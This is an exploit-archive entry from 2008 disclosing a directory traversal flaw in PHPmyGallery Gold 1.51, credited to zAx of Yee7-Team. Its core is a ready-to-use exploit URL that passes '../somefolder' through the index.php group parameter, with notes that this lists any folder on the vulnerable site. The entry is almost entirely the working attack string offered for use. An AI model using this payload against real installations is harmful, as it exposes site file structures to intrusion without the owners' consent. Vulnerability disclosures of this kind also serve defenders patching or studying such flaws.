id: 4382
date: 12/07/2008
title: PHPmyGallery Gold 1.51 (index.php) Directory Traversal Vulnerability
author: zAx
cves: 

====================================================================
PHPmyGallery Gold 1.51 (index.php) Directory Traversal Vulnerability
====================================================================


        PHPmyGallery Gold 1.51 (index.php) Folders Disclosure
 -----------------------------------------------------------------------------------------------------------

 [+] Script        : PHPmyGallery Gold 1.51
 [+] Vuln.          : Folders Disclosure
 [+] Download :http://phpmygallery.kapierich.net/en/downloads/
 [+] Discovered By  :         zAx 

Exploit : http://site/phpmygallery/index.php?group=../somefolder

 [+]Somefolder is any folder in the vulnerable website
 [+] ../ = Up from this folder
 [+] You can see all folders those are in "somefolder"


[+] Important : This vulnerability is Discovered By Yee7-Team, By [ zAx ] and [ ShockShadow ]



#  0day.today [2023-03-24]  #